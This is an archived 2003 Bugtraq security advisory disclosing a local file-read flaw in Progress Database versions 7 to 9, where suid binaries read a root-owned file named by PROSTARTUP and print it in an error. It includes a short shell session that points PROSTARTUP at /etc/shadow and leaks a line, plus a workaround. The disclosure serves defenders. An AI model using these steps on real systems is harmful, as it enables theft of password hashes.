SRT2003-04-02-1735 - Progress PROSTARTUP root owned file read

From: KF (dotslash@snosoft.com)
Date: 04/02/03

  • Next message: Larry Seltzer: "RE: Microsoft Terminal Services vulnerable to MITM-attacks."
    Date: Wed, 02 Apr 2003 12:28:19 -0500
    From: KF <dotslash@snosoft.com>
    To: bugtraq@securityfocus.com
    
    
    

    This data can be found at http://www.secnetops.biz/research

    -KF

    
    

    Secure Network Operations, Inc. http://www.secnetops.com
    Strategic Reconnaissance Team research@secnetops.com
    Team Lead Contact kf@secnetops.com

    Our Mission:
    ************************************************************************
    Secure Network Operations offers expertise in Networking, Intrusion
    Detection Systems (IDS), Software Security Validation, and
    Corporate/Private Network Security. Our mission is to facilitate a
    secure and reliable Internet and inter-enterprise communications
    infrastructure through the products and services we offer.

    Quick Summary:
    ************************************************************************
    Advisory Number : SRT2003-04-02-1735
    Product : Progress Database
    Version : Versions 7 to 9
    Vendor : progress.com
    Class : local
    Criticality : Medium to Low
    Operating System(s) : Linux, SunOS, SCO, TRU64, *nix

    High Level Explination
    ************************************************************************
    High Level Description : Error messages can provide root owned data
    What to do : chmod -s all suid binaries in /usr/dlc

    Technical Details
    ************************************************************************
    Proof Of Concept Status : No PoC is needed.
    Low Level Description :

    The Progress Database reads configuration files as the root user. No
    checks are made to verify that the user running thr program has the
    permission to read the configuration file. A user can simply specify
    a root owned file and cause an error message to be generated to view
    the file contents. Most versions beyond v6 appear to be affected.

    An example variable that can be abused is the PROSTARTUP variable.

    bash-2.03$ cat /etc/shadow
    cat: cannot open /etc/shadow: Permission denied (error 13)

    bash-2.03$ export PROSTARTUP=/etc/shadow
    bash-2.03$ export PROMSGS=/path/to/promsgs

    bash-2.03$ /u/dlc7/bin/_mprosrv
    17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

    bash-2.03$ /u/dlc8/bin/_mprosrv
    17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)

    bash-2.03$ /u/dlc9/bin/_mprosrv
    17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)

    Luckily on the machine I chose to exploit the line that was read from the
    shadow file did not have an encrypted hash. This however is not always
    the case.

    Patch or Workaround : chmod -s all suid binaries in the $DLC folder
    Vendor Status : vendor has been notified and is working on a fix
    Bugtraq URL : to be assigned

    ------------------------------------------------------------------------
    This advisory was released by Secure Network Operations,Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Exploit source code is no longer released
    in our advisories. Contact research@secnetops.com for information on how
    to obtain exploit information.


  • Next message: Larry Seltzer: "RE: Microsoft Terminal Services vulnerable to MITM-attacks."

    Relevant Pages